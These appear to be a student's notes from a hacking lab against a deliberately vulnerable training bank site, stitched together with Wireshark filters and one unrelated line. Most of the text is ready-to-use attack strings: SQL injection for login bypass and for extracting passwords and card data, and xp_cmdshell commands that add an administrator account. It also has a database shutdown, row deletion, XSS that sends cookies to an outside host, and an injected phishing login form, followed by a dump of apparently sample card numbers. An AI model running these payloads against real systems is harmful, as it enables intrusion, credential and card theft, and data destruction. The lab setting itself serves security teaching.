- 1/1/08 ' exec master..xp_cmdshell “net user paul noddy /ADD”; --
- 1/1/08 ' exec master..xp_cmdshell “net localgroup administrators paul /ADD”; --
- 1/1/08 ' exec master..xp_cmdshell "I am really bad at this > c:\sam.txt" -- '
- 1/1/08 ' exec master..xp_cmdshell "type c:\sam.txt" --
- ' union select null," code", " expirydate", " cardnumber", "cardname" from creditcard order by 4--
- ' exec master..xp_cmdshell "net localgroup administrators Robot /ADD"; --
- ' exec master..xp_cmdshell "type readme.txt"; --
- ' exec master..xp_cmdshell "dir C:\inetpub\wwwroot\buggybank\ > sam3.txt"; --
- ' exec master..xp_cmdshell "type RobotPoop.txt"; --
- \domains\buggybank.cave\wwwroot\
- ' exec master..xp_cmdshell "Copy sam3.txt C:\inetpub\wwwroot\buggybank\sam3.txt*"; --
- ' exec master..xp_cmdshell "Copy C:\inetpub\wwwroot\buggybank\xfer.asp C:\inetpub\wwwroot\buggybank\robotpoop3.txt*"; --
- Denial of Service
- 1/1/08 ' shutdown with nowait; --
- At the login prompt - data loss ...
- x ' or 1=1--
- 1 ' or 1=convert (int,(select top 1 cardname from creditcard))--
- 1 ' or 1=convert (int,(@@version))--
- At the URL input line:
- http://cave.buggybank.org/login.asp?username=' or 1=1--&account=9999
- http://cave.buggybank.org/login.asp?username=' having 1=1--&account=9999
- Error-based SQL injection (the database error messages disclose the data, so this is not truly blind)
- ' or 1=1--
- ' having 1=1--
- ' group by userinfo.username having 1=1--
- ' group by userinfo.username,userinfo.password having 1=1--
- 1'; insert into userinfo values('noddy1','noddy1')--
- 1'; update userinfo set password='noddy1'--
- 1'; delete from userinfo where usermame='noddy1'--
- o' or username like 'st%'--
- o' or username like 'd%'-- (then de, dem, demo)
- 1' or 1 = convert(int,@@version)--
- 1' or 1 = convert(int,@@servername)--
- 1' or 1 = convert(int,(db_name()))--
- 1' or 1 = convert(int,(user_name()))--
- 1' or 1=convert(int,(select top 1 password from userinfo))--
- 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('me')))--
- 1' or 1=convert(int,(select password from userinfo where username=('me')))--
- 1' or 1=convert(int,(select top 1 cardnumber from creditcard))--
- 1' or 1=convert(int,(select top 1 cardname from creditcard))--
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))-- ...then
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
- table_name not in ('REFERENTIAL_CONSTRAINTS','CreditCard','dtproperties','sysalternates','sysconstraints')))--
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))--
- 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
- table_name not in ('REFERENTIAL_CONSTRAINTS','%20hidden','dtproperties','sysalternates','sysconstraints')))--
- ' union select null, null, null, null, column_name from information_schema.columns where table_name = '%20hidden' --
- ' union select null, null, null, null, name from sysCOLUMNS --
- ' union select null from userinfo--
- ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
- ' union select null, null, null, null, column_name from information_schema.columns where table_name = 'creditcard' --
- ' union select null, null, null, null, count (*) from userinfo order by 5 --
- ' union select null, table_name, table_type, null, null from information_schema.tables --
- ' union select null,null,null,null, password from userinfo--
- ' union select null,null,null,null, username from userinfo--
- ' union select null,null,null,username, password from userinfo--
- Cross-site scripting (XSS) attacks
- <script>alert("VULNERABLE");</script>
- <script>document.location="http:\\www.malwarebytes.com";</script>
- <script>alert(document.cookie);</script>
- <a href=#onclick="document.location='http://www.malwarebytes.com?cookie='+escape(document.cookie)">click for free money</a>
- <iframe src="http://www.malwarebytes.com height="0" width="0"></iframe>
- Student is to research adding a form to a page - the solution is below...
- <script>window.onload=function(){document.getElementByID('hakcme').innerHTML ='<p>Please enter your buggybank username & password to login as admin</p><form method="get" action="http://www.malwarebytes.com">Username:<input type="text" name="username"/><br/>Password:<input type="password" name="passwors"/><br/><p><input type="submit" value="Login"/><p/></form>';};</script>
- Wireshark filters
- Display filters
- ip.src==10.5.11.1
- ip.src!=10.5.11.1
- ip.dst==
- http&&ip.src==
- tcp.port eq 80
- tcp contains 01:01:04
- snmp||dns||icmp
- ip.addr==
- decnet
- lat
- Capture filters
- tcp dst port #
- ip src host #
- src port range #-#
- not icmp
- src host # and not dst net #/16
- ether proto \icmp
- not broadcast
- The Antikythera mechanism: the world's oldest computer!
- 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('darren1','buggyboy','joker','demo','a','valus','alex','tony','me')))--
- ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
- 1125 4/8/2009 5108136656984175 Darren
- 1212 6/6/2014 43212255682521 Darren
- 1252 1/3/2014 43226587025400 Darren
- 1564 12/16/2009 6011002966567565 Darren
- 1568 9/9/2010 34565489474498 Darren
- 1657 12/4/2009 372407135137716 Darren
- 2364 9/8/2016 43556997816587 Darren
- 3456 12/12/2008 4800124627272269 Darren
- 3654 9/14/2013 34567789911235 Darren
- 4452 5/7/2009 5108132733652677 Darren
- 4468 8/18/2016 43221155547782 Darren
- 4486 5/5/2009 4673817253379452 Darren
- 4564 6/14/2012 43551126878954 Darren
- 4695 7/18/2014 34568897554889 Darren
- 5448 4/18/2011 43215484568798 Darren
- 5448 5/17/2011 43115877795246 Darren
- 5644 7/6/2011 34567874466884 Darren
- 5648 9/18/2010 6011008517179267 Darren
- 6411 3/4/2014 43659996571009 Darren
- 6486 7/6/2014 34569987554422 Darren
- 6878 9/19/2014 43556887774411 Darren
- 7655 2/2/2015 34561125548282 Darren
- 7897 8/17/2011 34561158889842 Darren
- 7952 5/24/2014 34567789428856 Darren
- 8410 9/28/2016 43221598735987 Darren
- 8871 4/18/2014 43698774563125 Darren
- 9028 4/4/2015 34566332158778 Darren
- 9542 4/8/2009 372861489856783 Darren
- 9544 3/22/2014 34567165484519 Darren
- 9878 4/18/2012 43556987458899 Darren